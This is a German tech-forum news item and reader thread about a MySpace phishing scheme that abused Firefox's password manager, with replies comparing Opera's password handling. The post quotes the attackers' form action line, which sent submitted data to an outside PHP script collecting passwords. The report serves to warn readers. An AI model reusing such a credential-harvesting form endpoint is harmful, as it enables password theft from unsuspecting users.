Viren, Spyware, Datenschutz 11.234 Themen, 94.586 Beiträge

Verfolgung starten Optionen
News: Missbrauch von Passwörtern

Scheußliches Sicherheitsloch in Firefox

Redaktion / 14 Antworten / Flachansicht Nickles

Bei Myspace ist eine neue Phishing-Variante aufgetaucht, die Passwörter aus dem Firefox abgreift und an eine andere Site sendet! Dort werden die Passwörter dann munter für Logins benutzt! Nur durch einen kleinen Layout-Fehler auf der Phishing-Site wurde der Diebstahl bemerkt.

Der Passwort-Manager von FF ist eine schöne Sache, aber dieser Exploit ist der schlichte Horror: Robert Chapin, der den Fehler gestern bei Bugzilla als Bug 360493 gemeldet hat, beschreibt, was ihm passiert ist:

In einem Formular in einem Myspace-Profil befand sich das folgende Attribut:

action="http://membres.lycos.fr/adel88duran/plaguedoctor.php"

Sendet man das Formular ab, wird das Skript ausgeführt. Danach erscheint ein gefälschtes Myspace-Login auf dem fr-Server und schwuppsdiwupps - FF trägt dort Name und Passwort ein, obwohl man sich auf der Domain membres.lycos.fr befindet! Es erscheint keine Warnung. Das funktioniert auch mit FF 1.x-Versionen, wie dieser Proof of Concept zeigt.

Einen Bugfix gibt es noch nicht.

Quelle: Bugzilla

bei Antwort benachrichtigen
Ich weiß schon, weshalb ich die Passwortverwaltung in Browsern noch nie ... F11-Q-Foxtrot
genau meine rede. jedoch ist es schade, dass es ein solches sicherheitsleck ... jperl
In diesem Fall ist der Anwender das Sicherheitsleck: Kennwörter müssen vom ... T-Rex
Was bitte ist Schade an einem Sicherheitsleck, dessen Exploit veröffentlich ... nowomen.de
das größte Sicherheitsleck ist und bleibt der USER am PC, unabhängig vom ... @Eisenhans
die meisten Pw s hab ich eh im Kopf. Es ist ja auch nicht grad sinnvoll 10 ... torsten40
Er trägt das passwort ein, aber sendet er es auch ab? So wie ich das ... Crazy Eye
Mit ein bißchen JavaScript-Code bekommt man das Abenden problemlos ... xafford
@Redaktion: Bitte nicht so reisserisch. Dagegen ist ja heise regelrecht ... the_mic
i.mer Redaktion „Scheußliches Sicherheitsloch in Firefox“
Optionen

Also, cih finde die Methode von Opera viel besser. Dort werden "gespeicherte" Felder lediglich farblich hervorgehoben. Klickt man dann auf OK/Submit, so kann nichts passieren. Das einloggen Erfolgt mit dem Button "Log in" oder Shift+X, bei entsprechender Einstellung auch beim weiterblättern mit Space, falls man das Seitenende erreicht hat. Aber die Aoutomatik-JS-Submit-Funktion ist erstmal aus dem Spiel, da der Browser nichts selbstständig einträgt.

Zudem lassen sich die Passwörter gezielt für einzelne seiten speichern.

Damit sind auch mehrere gespeicherte Accounts pro Seite oder Domain möglich, für die ein Auswahlmenü erscheint.

Ich ebenfalls möchte nie wieder auf diese Funktion verzichten.
Wenn ich ständig die Daten beim Mailer, Ebay und Nickles eintippen müssten, dann kann ich gleich zum Steinhammer greifen. So viel Komfort will ich einfach haben.

Das minimiert auch die Gefaht, sich ständig mit dem gleichen Passwort anmelden zu wollen (aber mal ehrlich, wer hat denn bei zwei-drei Dutzend Forummitgliedschaften je ein Passwort für jede???).

Tabu sind nach wie vor "teure" Sachen, wie Onlinebanking und Trading, da wird nichts gespeichert.

BTW: wollte von Web.de weg und schaute mir alle gängige Mailer an. Wahnsinn, fast überall ist das Einloggen über HTTPS erst durch einen optionalen Link angeboten.
Standard bei Yahoo, Arcor, Lycos und Co. immer unverschlüsselt. Bei GMX habe ich gar keine HRRPS-Option gefunden.

Bei Web.de ist es andersrum. Dafür mein Lob.

bei Antwort benachrichtigen
...ich habe mein opera auch ganz dolle lieb! - GarfTermy
Auch ich verwende seit langer Zeit schon FF. Aber nie würde es mir in den ... dff
wie schon gesagt, für weniger wichtige Seiten wie Foren oder ähnliches ist ... blueage
Der Vergleich ist FALSCH. Wenn man die Richtung wechselt und dein ... i.mer